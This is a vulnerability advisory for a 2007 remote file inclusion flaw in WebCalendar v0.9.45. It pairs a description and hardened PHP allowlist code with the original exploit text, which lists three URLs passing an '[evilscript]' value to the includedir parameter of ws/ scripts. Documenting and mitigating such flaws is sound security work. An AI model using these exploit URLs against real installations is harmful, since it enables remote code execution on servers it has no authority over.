Vendor: WebCalendar
By: Drackanz
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: WebCalendar
Affected Version From: WebCalendar v0.9.45 (13 Dec 2004)
Affected Version To: WebCalendar v0.9.45 (13 Dec 2004)
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include

WebCalendar v0.9.45 (13 Dec 2004) is vulnerable to remote file inclusion in the login.php, get_reminders.php, and get_events.php scripts under the ws/ directory. Each script builds an include path from the includedir request parameter without validating it, so an attacker who supplies a crafted value for that parameter can make the script include an arbitrary file, including one hosted on a remote server. This can lead to remote code execution and compromise of the affected system.

Mitigation:

Apply the latest patches and updates for the WebCalendar software. Additionally, ensure that user input is properly validated and sanitized, and never used unchecked to build include paths, to prevent arbitrary file inclusion vulnerabilities.
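The following is an added illustration of the mitigation just described; it is not WebCalendar's own code. It contrasts the unsafe pattern the advisory describes (an include path taken straight from the includedir request parameter) with a hardened resolver that accepts only directory names from a fixed allowlist, rejects URL wrappers and traversal sequences, and confirms with realpath() that the resolved directory sits under the application root. The parameter name includedir comes from the advisory; the allowlist entries, the base path and the config.php file name are assumptions made for the example.

```php
<?php
// Added example, not WebCalendar's code. Parameter name "includedir" is from the
// advisory; the allowlist, base path and config.php file name are assumptions.

// Only these application subdirectories may ever be used as an include directory.
const ALLOWED_INCLUDE_DIRS = ['includes', 'includes/classes'];

/**
 * Resolve a requested include directory against the allowlist.
 * Returns the absolute directory path, or null when the request is rejected.
 */
function resolveIncludeDir(string $requested, string $appRoot): ?string
{
    // Reject anything with a scheme prefix (http://, ftp://, php://, data:, ...),
    // which is exactly what a remote file inclusion attempt relies on.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $requested)) {
        return null;
    }
    // Reject NUL bytes and traversal sequences before touching the filesystem.
    if (str_contains($requested, "\0") || str_contains($requested, '..')) {
        return null;
    }
    // Exact allowlist match only; no prefix matching, no case folding.
    $normalized = trim($requested, '/');
    if (!in_array($normalized, ALLOWED_INCLUDE_DIRS, true)) {
        return null;
    }
    // realpath() returns false for paths that do not exist. Even after the
    // allowlist check, confirm the canonical directory is inside the app root.
    $root = realpath($appRoot);
    $dir  = realpath($appRoot . '/' . $normalized);
    if ($root === false || $dir === false
        || !str_starts_with($dir, $root . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $dir;
}

// Unsafe pattern the advisory describes (shown for contrast only):
//   $includedir = $_GET['includedir'];
//   include $includedir . '/config.php';

// Hardened usage: unknown or malformed values fall through to a 400 response.
$requested  = $_GET['includedir'] ?? 'includes';
$includedir = resolveIncludeDir($requested, __DIR__);
if ($includedir === null) {
    http_response_code(400);
    exit('Invalid include directory');
}
require $includedir . '/config.php';
```

As defence in depth, set allow_url_include = Off (and, where the application does not need remote streams, allow_url_fopen = Off) in php.ini so that include and require cannot open URL wrappers at all, independently of application-level validation. str_contains() and str_starts_with() require PHP 8; on older interpreters substitute strpos() checks.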
Source

Exploit-DB raw data:

|-------------------------------------------------------------------------------|
|                                                                               |
| WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include             |
|                                                                               |
| Script  : WebCalendar                                                         |
| Version : v0.9.45 (13 Dec 2004)                                               |
| Author  : Drackanz                                                            |
| Contact : Drackanz [at] gmail [] com                                          |
| Vendor  : http://www.k5n.us/webcalendar.php                                   |
|-------------------------------------------------------------------------------|
| Bug in :                                                                      |
|   login.php                                                                   |
|   get_reminders.php                                                           |
|   get_events.php                                                              |
|-------------------------------------------------------------------------------|
| EXPLOIT :                                                                     |
|                                                                               |
| http://localhost/[calendar]/ws/login.php?includedir=[evilscript]              |
| http://localhost/[calendar]/ws/get_reminders.php?includedir=[evilscript]      |
| http://localhost/[calendar]/ws/get_events.php?includedir=[evilscript]         |
|-------------------------------------------------------------------------------|
| Greetz : Leo,hardose,s4mi,fucker_net,The Casper,Broken-Proxy,Simo64,          |
|          exe_crack,b0rizq,righterz,dragon,rachidox All Moroccan HackerX;      |
|                                                                               |
---------------------[ [Mor0ccan ISLAM Defenders Team] ]-------------------------

# milw0rm.com [2007-03-15]